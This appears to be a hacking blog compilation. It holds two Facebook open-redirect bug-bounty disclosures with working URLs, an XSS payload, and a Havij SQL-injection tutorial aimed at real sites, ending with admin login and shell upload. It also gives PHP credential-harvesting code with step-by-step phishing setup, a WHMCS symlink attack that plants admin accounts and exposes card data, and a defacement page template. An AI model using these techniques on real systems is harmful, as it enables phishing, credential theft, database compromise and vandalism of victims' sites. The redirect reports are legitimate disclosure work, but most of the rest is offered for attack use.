Facebook Open URL Redirection Vulnerability [Bug Bounty Program]

Hi everyone it's been long since my last post as I was busy these days. Today I'm gonna disclose my bug found on facebook. I have been rewarded $1000 for this bug and soon will be in facebook whitehat list.

Description
An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Consequences
Phishing
Platform All web platforms affected -Owasp-


Description:
[#] Title    :   Facebook Open URL Redirection Vulnerability
[#] Status   :   Fixed
[#] Severity :   Medium
[#] Works on :   Any browser with any version
[#] Reward   :   $1000
 
I have found 6 Open URL Redirectors in facebook's 6 different dialogs.This Vulnerability is exploitable to all users who are signed into facebook. This bug is very similar to the one which Arul Kumar.V have found recently, as I also have to bypass the user interaction. To bypass the user interaction I have used the Mozilla addon Live HTPP Headers and got the necessary parameters to bypass the user interaction. I have used these parameters:
from_post=1, _path=send, error_ok=Okay
You can watch the POC video here: https://vimeo.com/80538675
 Impact of Vulnerability:
1. The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine.
2. The user may be subjected to phishing attacks by being redirected to an untrusted page.
3. This bug can be applicable to any user who are signed in which works at any browsers with any version

About Facebook Dialog:
Dialogs provide a simple, consistent interface to provide social functionality to people using your apps. Dialogs do not require any additional permissions because they require someone to directly interact with them. Dialogs can be used by your application in several contexts: in a website or mobile web app, within native iOS and native Android applications, or in a game on Facebook.com

Reference: https://developers.facebook.com/docs/dialogs/ 

Reproduction Instructions / Proof of Concept: 
If any signed facebook user clicks any one of the following link,they will be redirected into our desired pages.URL Shorteners can be used to mask malicious links. I got redirects on six different dialogs.
Note: You must be signed into a facebook account to redirect sites.

Vulnerable URL's:
https://m.facebook.com/dialog/send?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay
https://m.facebook.com/dialog/pagetab?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay
https://m.facebook.com/dialog/feed?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay
https://m.facebook.com/dialog/share?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay
https://m.facebook.com/dialog/pay?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay 
https://m.facebook.com/dialog/login?next=http://google.com&app_id=104018109673165&from_post=1&_path=send&error_ok=Okay

After I have reported the bug I got this reply. And they fixed the bug within a week.

XSS Vulnerability in translate.googleusercontent.com

Hi everyone. Today I came up with a XSS vulnerability in translate.googleusercontent.com. But as in Program Rules - Application Security - Google bugs like XSS in sanbox domains do not qualify for a bounty and are not considered as bugs.
To reproduce this XSS you have to go to translate a document page in Google Translate. Then you just need to create a .txt document by writing these lines to translate.
Script to write in the .txt file:
<script>alert("hacked")</script>

After you have created your .txt file upload it to the page and hit translate. But make sure you are translating it to a language other than English, or else it will not work. And you got XSS in translate.googleusercontent.com.

SQL injecting using "Havij - Advanced SQL Injection Tool" [TUT]

Hello guys, Today I'm going to teach you guys how to exploit SQL vulnerable sites using Havij Automatic (Advance SQL Injection Tool).
So lets start the tutorial to hack a website using Havij.

By SQL injecting you will get the Website's Database. First you should know what a Database is.

The Website Database is a collection of Information like Images, Login ID's, Password, Company Data, etc.
That is all stored in a Server Database so that it can be easily acessed, managed and updated. In one view,
databases can be classified according to types of content : Bibilographic, full-text, numeric, and Images etc.

What is Havij ?
Havij Pro is an advanced SQLi Vulnerability Exploiter, that can Exploit SQL Injection Vulnerability in Website
and and get accessed into website database. Havij is Automatic Advance SQLi Tool.

So lets start it.
First using Havij is an easy way.There aren't any complicated steps to be followed unlike when you are manualy injecting it.
But you wouldn't know what actually Havij is doing if you haven't learned manual SQL injection.

Things you will need :

Havij Pro (Google it or comment if you can't find it)
A website Vulnerable ro SQL (You can use Google dorks to find)
And probably a BRAIN. :P
NOTE: If you want to find  SQL in a particular your desired website, you can use Acunetix or Owasp vulnerability scanner.
   
The real deal comes here.[EASY]

After you have found SQL vulnerability in a website.
Enter Website URL into Target box and Analyze it.
After Analyzing you can see that, It will find Database name, Tables and other things.
Always keep your an eye on STATUS BOX [Log]

And now, We got Database name and Tables, Let's find out Columns and Data of Emails, Users, Password etc.
Now after getting Database name, you can see that "Tables" button is activated and we can read Tables.
Just click on "Tables" and you will get table.
Here, we are Successful in finding database Table, now it's time to find Database Row and Columns,
So now click on Get DBs.
DBs will load all Database to Program and it can be easily access-able. Now again click on Get Tables.

Finally we got up 'users' table, Now select users and click on 'Get Columns'.

After Getting Columns and all.. Finally Click on 'Get Data' and you will get all login ID and passwords.

So, here we got up Website Admin ID and Password. Now finally you have to decrypt the password if it is hashed.[ In  most websites passwords are hashed]
Now, it's time to Enter into Website using this Two Admin login ID and Password.
To get the Admin page Click on 'Find Admin' and click on start to Analyze the admin page.
Now go to that URL of admin and Login with ID and password you got from Database. Now you have successfully hacked into a website.
You just need to upload the shell and do much more exciting things.
If you don't have a Vulnerable Website then Just Create Penetration testing lab in your Computer like OWASP-BWA, DVWA etc.

NOTE: This article is for educational purposes only. I am not responsible for any misuse of this article. Remember that hacking is illegal in most of the countries. You can create a Pentesting lab and test your skills there.

Phishing Page [TUT] - Noob Freindly

Phishing has become a very easy to use trick to hack usernames and passwords of users.
Today I will teach you guys how to create phishing page for almost any site which uses login form (for example:Facebook,
 Gmail, Yahoo, etc)
For makin a phishing page and using this method of hacking you need a hosting site(Google it for free web hosting sites)
or your website also.
Register yourself at a free hosting site.

Note: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.

Well as now you have a hosting account, lets start to create the Phising Page
Step one.
First go to the target site. In your browser select Save As from the File menu and save the site on
 your computer with name "login.html" .

or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file.
Rename the file with "login.html".

Now the step two.
Open up your Notepad and copy this into it

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Replace facebook.com with the URL you want the user to redirect after he click on login button.
Save the page as Phish.php

Now you need to edit the "login.htm" file we have saved earlier. So navigate to that and open it with notepad.
now search for any html like "action=" which has something with login. And replace the URL with "Phish.php".

Also create a blank txt file with name "log.txt". This file would be used to save the victims logins and passwords.
Now you are done with making the Phishing Page.

Go to your hosting account and upload all the files to your server. You should upload all three files
Now go to the URL provided by your host.

Like - http://faceboook-1.hostingsite.com/login.htm

And you would see the Phishing page as it is in the real site.
For testing type anything on the login and password field and hit login button.

Check the log.txt file. The password and username you entered previously would be saved in the log.txt file.
WOW, you just have your own phishing page now.

Note: If you have any doubts or where to create a hosting account feel free to comment. I will try to reply to you as soon as possible.
ONCE AGAIN NOTE: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.

Hacking WHMCS [TUT] 2013

Hi guys. Today i will be showing how to hack a WHMCS via symlinking so lets get started.
Things you will need:
1) Shelled website
2) Tool i will post at the end of the tutorial
3) Putty
4) Symlink script
5) MySQL manager
What is WHMCS?
Code:

“WHMCS is an all-in-one client management, billing & support solution for online businesses. Handling everything from signup to termination, WHMCS is a powerful business automation tool that puts you firmly in control”

DEMO: http://demo.whmcs.com/
ADMIN AREA DEMO: http://demo.whmcs.com/admin/login.php
How do i find if my server has WHMCS?
That is easy
Check your kernel. Usually it will be like:

Code:

Linux ns1.hosting.com x.x.xx-xxx.xx.x.xxx #1 SMP xxx xxx x xx:xx:xx EST 2012 x86_64

If your kernel has something like "ns1.hosting.com" in your kernel that means WHMCS is installed on that site.

So go to the hosting.com and you will probably find it.
Or you can google dork it:

Code:

site:hosting.com inurl:/admin/login.php "WHMCS"

Exploiting
First off we need to find our hostings path.
So do

Code:

cat /etc/passwd

or just view the /etc/passwd file to find all the users on the hosting.
Once you did that save it to the .txt file somewhere.
In my example i got lucky and found the path easy. (There was WordPress installed so i viewed wp-content/plugins/akismet/legacy.php which gave me full path)
But usually you can find it by the URL.
Now i know my site's path:
Code:

/home/user/public_html/

And WHMCS path is /hosting/ so my goal file is configuration.php located in
Code:

/home/user/public_html/hosting/configuration.php

Okay, now make a new folder in your shell.
We will now try to access the file mentioned above.
Next thing i want to is to enter the folder and upload the script
We will now try to access the file mentioned above.
Next thing i want to is to enter the folder and upload the script
In that box enter the path and the file you want:
Code:

/home/user/public_html/hosting/configuration.php

Press go and you now get something like this:
Press on symlink and it will open a new page.
Notice how the site is blank. That means it worked.
Right click -> View source and our targets database will be there.
Getting access to the WHMCS
Now that you managed to get configuration info from the site you now need to connect to the MySQL base and create a new administrator.

Open our mysql.php script (Provided on the end of the tutorial) and enter credentials (Username and password)
When you are logged in on the main database click "Tables".
NOTE: You can press "Dump" to save all info in the database!
You got a list now. Good.
Find tbladmins and click "Data"
From there you can edit/add admin users.
As you can see i added a new user so i can access it later.
Now i login with the new user i created
Now i have tool for this cases
There you can manage cPanels, dump them, view CC info and rest of the BH shit. :)

Facebook Open URL Redirection 2013

Hi, everyone. Today I'm going to disclose my Facebook Bug to the public. I found this bug on 11 September 2013, but I was disappointed to hear from the Facebook Security "Emrakul" that a previous reporter had reported that bug before me.:( But they have fixed the vulnerability so I'm going to disclose it.
Descriptions:
Title           :  Open URL Redirection
Status        :  fixed
Severity     :  Low
Works on  :  Any browser with any version
I found the redirection on the "/dialog/feed/" after "www.facebook.com".

1. The user may be redirected to an untrusted page that contains
malware which may then compromise the user's machine.
 
2. The user may be subjected to phishing attacks by being redirected
to an untrusted page.
 
3. This bug can be applicable to any user who are signed in facebook.
repro:
If any signed facebook user clicks any one of the following link,they will be redirected into our desired 

pages. URL Shortners can be used to mask malicious links.
Note: You must be signed into a facebook account to redirect sites.

 VULNERABLE URL's
 
https://www.facebook.com/dialog/feed/fb_dtsg=AQCRqLbh&charset_test=%E2%82%AC%

2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&error_

ok=Okay&_path=feed%2F&redirect_uri=http%3A%2F%2Fgoogle.com&display=touch&from_post=1
 
https://m.facebook.com/dialog/feed/fb_dtsg=AQCRqLbh&charset_test=%E2%82%AC%2C%

C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&error_ok=

Okay&_path=feed%2F&redirect_uri=http://google.com&display=touch&from_post=1
 
https://touch.facebook.com/dialog/feed/fb_dtsg=AQCRqLbh&charset_test=%E2%82%AC%2C%

C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&error_ok=Okay

&_path=feed%2F&redirect_uri=http://google.com&display=touch&from_post=1
 
https://beta.facebook.com/dialog/feed/fb_dtsg=AQCRqLbh&charset_test=%E2%82%AC%2C%C2

%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&error_ok=Okay

&_path=feed%2F&redirect_uri=http://google.com&display=touch&from_post=1

 By deleting "AQCRqLbh" after "fb_dtsg="  and "%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%

C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84" after "charset_test=" also we can redirect to 

the desired website.
 
You just have to change the http://google.com your desired malicious link.

This was said in the original message received by me from the facebook security.

Hi,
 
We're already aware of this issue because a previous reporter sent this in to us. 

We're working to fix it but we won't be able to reward you. We appreciate you taking the time 

to find and send this our way.
 
Thanks,
 
Emrakul
Security
Facebook
 
-----Original Message to Facebook-----
From: xxxxx@hotmail.com
To: 
Subject: Site redirection vulnerability
 
Name: xxxxxxxxxxxx
E-Mail: xxxxxx@hotmail.com
Type: open_redirect
Scope: www

How To Make A Cool Deface Page

HOW TO MAKE A COOL DEFACE PAGE

Hello everyone today I'm going to show you guys how to make a cool deface page. It is very simple to make a deface page. Before we start I will tell you what exactly is a deface page. A deface page is a HTML page that you upload after you upload after hacking into a website. Its only just to show that you have breached their security. As now you know what is a deface page let's start with our page.
To create a deface page you must know HTML , OR you can use Google to find HTML tags. You can learn HTML and many other languages here Codecademy.

STEP ONE
Open up your notepad. Go to Start>All Programs>Accessories>Notepad.

STEP TWO
So we are going to make a template for almost all it is same.
Put this in your Notepad.

<!DOCTYPE html>
<title>Page title here</title>
<html>
<body>

</body>
</html>

So now , if you don't know basic of HTML then you can visit the Codecademy and learn some basic stuff. The <html></html> tag tells almost everything to recognize it as a website this have to be in the document. Otherwise, it wont be able to show the contents.
And then the <body> </body> tag is the place where you put the content of the page.

Ok we have enough basics. So I'm moving forward. So first we need to put a background color and the a heading for the page.you have to put some codes like I have. Put "<body bgcolor="black">" to change the background colour. To make a heading put
"<h1 style="font-size: 60px; color: white; font-family: Agency FB">MvStats10 W4S H3r3</h1>"
this code.
Now it is like this. You can see how the page look like by saving this on all file types and under *.html format.

<!DOCTYPE html>
<embed src="https://www.youtube.com/v/YHWRLtybykc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Page title here</title>
<html>
<center>
<body bgcolor="black">
<h1 style="font-size: 60px; color: white; font-family: Agency FB">MvStats10 W4S H3r3</h1>
</body>
</html>

If you want to put a song in your deface page you can just go to youtube and play the song. At the end of the URL after "http://www.youtube.com/watch?v=" there will be some codes. Something like this "YHWRLtybykc". Ok copy that code and

 " <embed src="https://www.youtube.com/v/paste the code here&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed> "

And then add it after "<!DOCTYPE html>"
Like this.

<!DOCTYPE html>
<embed src="https://www.youtube.com/v/YHWRLtybykc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Page title here</title>
<html>
<body>

</body>
</html>

So now I will show you how to put images on your deface page. <img src="http://s17.postimg.org/z28c3ghnj/images.jpg"/> 
now your template will look like this.

<!DOCTYPE html>
<embed src="https://www.youtube.com/v/YHWRLtybykc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Page title here</title>
<html>
<center>
<body bgcolor="black">
<h1 style="font-size: 60px; color: white; font-family:Agency FB">MvStats10 Was Here</h1>
<br>
<img src="http://s17.postimg.org/z28c3ghnj/images.jpg"/>
</body>
</html> 

Now you have left to write your message. After the image tag , open up <p></p> tag so you can write your message. Write your messages like this on the <p></p> tag.
"<p style="color: white; font-family: Courier; font-size: 20px">hello admin!<br>Mvstats10 has breached your security.
<br>Please do not blame us for this.
<br>Your Low Security Made Us Do This
<br>Bye</p>"

Now we are finished making the deface page. your template should be something like this.


<!DOCTYPE html>

<embed src="https://www.youtube.com/v/YHWRLtybykc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Page title here</title>
<html>
<center>
<body bgcolor="black">
<h1 style="font-size: 60px; color: white; font-family:Agency FB">MvStats10 Was Here</h1>
<br>
<img src="http://s17.postimg.org/z28c3ghnj/images.jpg"/>
<p style="color: white; font-family: Courier; font-size: 20px">hello admin!<br>Mvstats10 has breached your security.
<br>Please do not blame us for this.
<br>Your Low Security Made Us Do This
<br>Bye</p>
</body>
</html>

Now save your page in HTML format or else it won't work like this defacepage.html. Remember to change the text format to All Files on Notepad when saving.
You can also make the text self write also which is on javascript and bit more complicated. My deface page's texts are self written. Its bit cool you can edit my deface page.
You can find my Deface Page Here.

Now we have finished making our deface page. Hope this article helped you guys a lot.
Feel free to comment your ideas or any doubts regarding this.
Enjoy Making your Deface page.